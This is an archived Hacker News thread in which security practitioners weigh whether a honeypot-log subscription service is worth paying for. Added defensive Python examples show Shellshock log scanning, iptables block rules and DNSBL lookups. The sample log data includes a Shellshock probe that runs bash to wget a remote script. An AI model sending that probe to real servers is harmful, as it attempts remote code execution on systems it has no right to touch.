Ask HN: Would you pay for honeypot logs?
13 points by fabulist on Oct 24, 2014 | 25 comments
Howdy,

I'm considering launching a subscription service that helps you strengthen your network's security by providing logs of real-world attacks, gathered from a network of honeypots. The logs would be searchable by protocol, vulnerability, and perhaps more, enabling your IT staff to develop IDS and firewall rulesets from in-the-wild attacks.

Would you pay for this? How much?

I'd also love to hear from anyone who thinks this isn't feasible.

Thanks in advance, fabulist



I work within the security operations team of a major global service company, working with private businesses, local, regional and civil government.

Our main pain point is never information - we can get that in spades. Our pet Unix engineer is constantly finding interesting new feeds for us, and I spend a notable amount of time each week keeping up to date with latest developments and any new information sources that crop up.

The challenge is translating this information into sound, actionable, intelligence that measurably provides value to our business and customers. Raw logs of random honeypots are of no interest to us, and if we wanted such a thing we could roll our own relatively easily.

Honeypots based outside of our organization would only be of interest in a few limited scenarios: Firstly, when a major new vulnerability lands it would be invaluable to know right from the start what sort of attacks are being seen in the wild. Ideally it would also be able to look back in time and discover if this zero-day was being exploited prior to the vulnerability's disclosure. Secondly, what we couldn't do is set up honeypots in multiple different sectors and compare attack profiles - e.g., between a hospitality company and, say, a local council.

In both those cases though, what we would want is the results of the analysis and expert recommendations, not the raw logs.

As others have already suggested, what we would be very interested in is honeypots-as-a-service: Being able to drop a fake finance server into our estate and detect access attempts. Create a fake company division website and see who tries to attack it and how. Be alerted to targeted attacks before they actually enter the production estate.

Something I'm fond of saying is that whenever an investigation or assessment is performed, what actually earns you the money is the report at the end. That report and the actionable intelligence within is your product, not the tool you use to generate it.


I would suggest startups are the wrong area. Startups barely have money to pay for staff and often don't know or care about their security risk. They also tend to use tools which allay some of that risk (e.g., Stripe, etc. for credit cards, non-storage of PCI-Compliant data). Mid-sized companies often have sensitive data, older techniques, and/or budget - and can be convinced of their risk. I would suggest going the route of medium-size businesses up to lower Fortune 3000 companies. The reason is that the CISO position is increasingly going to those in security with a penetration-testing background rather than other areas of security (e.g., physical, Identity & Access, etc.). You might look at a strategy similar to http://Phishme.com which is selling into larger accounts.

[my background: used to implement and sell security into Fortune 1000 accounts and SMBs]


Do you have any ideas as to how to gather budget to release a business on a bigger scale?


Security is an odd area. In selling (and implementing products), as well as helping a friend launch his Cloud security business - the market has a huge issue for startups if you approach it incorrectly. As opposed to areas ripe for SaaS penetration, security offerings solving traditional or incremental problems face a large resistance because buyers/stakeholders "won't get fired for choosing Netegrity/Oracle/<largeco>" if something goes wrong. They can always blame it on the consultant implementation team. Plus, there's a large risk to an organization using a new player to solve an old problem. Phishme (not associated, but have friends who know them) took a new approach (email phishing) which wasn't offered by large players. We found this out the hard way in a startup, along with long sales cycles and requirements. For a security offering, the Mach37 accelerator can be a good place to start.


I can't answer about whether I'd buy it (I'm not in that market) but you should know that the competition in the space you're considering is, or at least was, pretty fierce. Vendors you should look at include iDefense, TippingPoint, Arbor, and Symantec.


I think this would be a tough sell in enterprise environments because the analysis of log data takes time and analysts are likely to say they have enough data from their own logs. They would also get stuck on the differences between the honeypot environment and their own network.

That said, it would be valuable if I wanted to blacklist certain IP addresses.

You may also consider a data sharing service that would provide access to anonymized log data shared among subscribers, this would allow subscribers to get data from real systems. Some vendors market similar services (such as RSA's eFraud Network).


I work in security for a large financial firm and demo enterprise products like these pretty frequently.

My answer to this would be a simple "no". Obtaining and structuring honeypot logs is not hard, and is basically a solved problem. This falls under the greater umbrella of "threat intelligence", and there are a ton of open source and enterprise solutions for threat intelligence feeds and collection. You would have extremely contentious competition, plus odds are a lot of what you're doing can also be done by an in-house analyst with some Python skills and access to public and private feeds.

Some sort of significant value would have to be added on top of the logs, and no, not just categorizing or grouping or ranking the logs.

If it's still honeypots you're interested in, then a better idea may be to offer an "active defense" honeypot service to get early warning on targeted attackers. This can include things like decoy/trap email accounts, web and network services, documents, and more.

Some startups are in this space, but it's a pretty immature field. It also has a lot of problems because many top managers and execs feel very uncomfortable with the idea. My own company has discussed it before but management has declined due to legal concerns, and also the concern that baiting an attacker may make you more of a target.

But I feel this area may be ripe for disruption. Get a few of the big names doing things like this and it's easy to convince smaller companies in the same vertical to do it as well. Actually, some big names may already be doing it, but if they are they're probably hush-hush about it.

In summary: honeypots sitting open on the Internet offer some interesting intelligence, but the honeypot you run and the honeypot anyone else runs will generate roughly the same intelligence and logs. And a lot of these logs are already converted into network indicators and rolled into hundreds of threat intelligence feeds that many security departments are already consuming. You won't be able to generate a lot of value by running and processing your own personal honeypots, in fact I would consider it a massive waste of time from a product or service perspective (though running one certainly is educational and can be fun).

But a honeypot sitting within an enterprise network/domain can be very useful and very valuable to a company. If you provide such a service, I would recommend it as a software suite set up by the client, definitely not as a cloud service.


This service may be useful to security companies and security researchers or analysts, and for them it shouldn't be hard to get this type of data.

A better service would be to embed somehow honeypots into the client's infrastructure and deduce customized actions in a mostly automated, semi-supervised way.

The problem with security logs (and logs in general) is that they are hard to take specific actions on. I don't even recommend installing an IDS like Snort to most people; you see lots of automated intrusion attempts, almost all just fishing for a vulnerability in an application that you don't even have. Now what, are you going to dedicate someone to go through them and see if the infrastructure is vulnerable to them?


> dedicate someone to go through them and see if the infrastructure is vulnerable to them?

No - Somebody has just done that for you, for free.


This is a space I spend an enormous amount of time in, so it sounded interesting.... then I didn't get it.

Honeypot logs aren't really interesting - since I don't care what happens inside them. Now, if you could embed your honeypots as a service with companies, and get them to accept data sharing, that's more interesting. If you can somehow integrate the results or share things with Team Cymru or VXShare, it becomes a lot more interesting.

But the thing is - I already get a lot of that value from cuckoosandbox - and more recently elastic-cuckoo. https://github.com/drainware/elastic-cuckoo.


I would use Tilt to quickly test to see if people would buy into the concept. https://www.tilt.com/campaigns/new?sell=1


Checking it out, thanks


Charge for them to be searchable. That way, people can lookup strings or patterns being sent to their server and see what attacks they match up against.


Honeypot logs? No.

Analysis and consumables pulled from the logs? Maybe.

Say you provided block lists for smtp/ssh/http which were actively updated, firewall rules, log filters, packet capture filters, &c to help find and prevent some of the illicit traffic on my own network.

For example, when shellshock was around several people posted grep strings to tease attack attempts out of apache logs.
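Added example (not code from the thread or from any of its posters): the sort of "consumable" the comment above describes, and the indicator extraction the earlier financial-firm comment says feeds already do. It runs the Shellshock grep-style check over a few constructed Apache combined-format log lines (the addresses are documentation ranges, not real attackers), pulls out the source IPs, and emits firewall rules. The regexes and helper names are this example's own.

```python
import re
from collections import Counter

# Constructed sample Apache "combined" access-log lines (not from any real honeypot).
# Lines 1 and 3 carry the Shellshock probe string in the User-Agent and Referer
# headers respectively; the other two are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.9/x.sh'"
198.51.100.22 - - [25/Sep/2014:10:02:14 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Sep/2014:10:03:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "() { ignored;}; echo vulnerable" "curl/7.35.0"
192.0.2.33 - - [25/Sep/2014:10:05:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux)"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock (CVE-2014-6271) probes open with an empty bash function definition "() {";
# the optional whitespace also catches the "(){" spelling.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_shellshock(entry):
    """True if any logged header-derived field carries the Shellshock signature.
    Caveat: only the request line, Referer and User-Agent reach the access log,
    so a probe sent in another header (e.g. Cookie) is invisible here."""
    return any(SHELLSHOCK_RE.search(entry[f]) for f in ("req", "ref", "ua"))


def scan(log_text):
    """Return the parsed entries that look like Shellshock attempts."""
    entries = (parse_line(l) for l in log_text.splitlines() if l.strip())
    return [e for e in entries if e and is_shellshock(e)]


def block_list(flagged):
    """Unique source addresses, most active first, then by address."""
    counts = Counter(e["ip"] for e in flagged)
    return sorted(counts, key=lambda ip: (-counts[ip], ip))


def iptables_rules(ips):
    """Consumable firewall rules of the kind a subscriber could apply directly."""
    return [f"iptables -A INPUT -s {ip} -j DROP" for ip in ips]


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for e in hits:
        print(f"{e['ip']} {e['ts']} {e['req']!r}")
    print("\n".join(iptables_rules(block_list(hits))))
```

The access log only shows the headers Apache writes, which is why the check is worth running on the honeypot's full request capture rather than its access log alone; and a block list built from one honeypot is exactly the kind of indicator the thread says is already sold and given away in bulk.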


> Analysis and consumables pulled from the logs? Maybe

But this exists already in a form of RBL/PBL/XBL/etc. Not that it cannot be done better, e.g. for smoother integration into existing perimeter security systems, but it exists nonetheless and it's free.
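Added example (mine, not the commenter's) of what "integration into existing perimeter security systems" looks like for the free lists named above: a DNSBL lookup against Spamhaus ZEN, which bundles SBL, XBL and PBL. The query-name construction and the return-code meanings follow Spamhaus' published scheme; the resolver is injectable, and the answer table below is constructed so the logic runs offline. Querying the live zone from a network is subject to Spamhaus' usage terms.

```python
import ipaddress
import socket

# Spamhaus ZEN answers a listed address with an A record in 127.0.0.0/8 whose last
# octet says which list matched. Mapping per Spamhaus' published return codes.
ZEN_ZONE = "zen.spamhaus.org"
ZEN_CODES = {
    "127.0.0.2": "SBL",
    "127.0.0.3": "SBL (CSS)",
    "127.0.0.4": "XBL",
    "127.0.0.5": "XBL",
    "127.0.0.6": "XBL",
    "127.0.0.7": "XBL",
    "127.0.0.9": "SBL (DROP)",
    "127.0.0.10": "PBL",
    "127.0.0.11": "PBL",
}


def dnsbl_query_name(ip, zone=ZEN_ZONE):
    """Reverse the octets and append the zone: 203.0.113.7 -> 7.113.0.203.zen.spamhaus.org"""
    addr = ipaddress.IPv4Address(ip)  # raises ValueError on anything but an IPv4 literal
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def interpret(answer):
    """Map an A-record answer to a list name. 127.255.255.x is an error code
    (rejected query), not a listing, so it must never turn into a block."""
    if answer is None:
        return None
    if answer.startswith("127.255.255."):
        raise RuntimeError(f"DNSBL returned error code {answer}; do not block on it")
    return ZEN_CODES.get(answer, f"unknown code {answer}")


def lookup(ip, resolver=socket.gethostbyname, zone=ZEN_ZONE):
    """Return the list the address is on, or None when it is not listed.
    `resolver` is injectable so the logic can be exercised without network access."""
    try:
        answer = resolver(dnsbl_query_name(ip, zone))
    except socket.gaierror:
        return None  # NXDOMAIN: not listed
    return interpret(answer)


# Constructed, offline stand-in for a resolver: fake answers for documentation addresses.
FAKE_ANSWERS = {
    "7.113.0.203.zen.spamhaus.org": "127.0.0.4",        # pretend 203.0.113.7 is XBL-listed
    "33.2.0.192.zen.spamhaus.org": "127.0.0.11",        # pretend 192.0.2.33 is PBL-listed
    "1.1.168.192.zen.spamhaus.org": "127.255.255.254",  # constructed error-code answer
}


def fake_resolver(name):
    """Behaves like socket.gethostbyname against FAKE_ANSWERS."""
    if name not in FAKE_ANSWERS:
        raise socket.gaierror("NXDOMAIN")
    return FAKE_ANSWERS[name]


if __name__ == "__main__":
    for ip in ("203.0.113.7", "192.0.2.33", "198.51.100.22"):
        print(ip, lookup(ip, resolver=fake_resolver))
```

The error-code branch is the check worth keeping: an open resolver or a rate-limited query answers in the 127.255.255.x range, and a perimeter device that treats any 127.x answer as "listed" starts dropping everything.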


Agree with cz. Put that in a box that plugs into a wall and gets warm and sell it for 30k to enterprise companies, and you could have a product.


I agree - but 99% of Fortune 1500+ companies do not have the staff or knowledge in how to implement, analyze, operate these.


It'd be more interesting if there was service which analyzed the client's logs and recommended specific action (per client), with the unique insight gained by your honeypot network. Something like an API which you hooked up with your infrastructure, fed logs into it, and got periodical security recommendations and alerts in return.


Is the email in your profile active and working? I have something for you


Yes


Honeypots have high value when embedded in high value networks.


No, can't say I would. I don't see what the benefit would be


Good to know. :)


This has been very interesting, thank you all for your feedback.


I'm broke

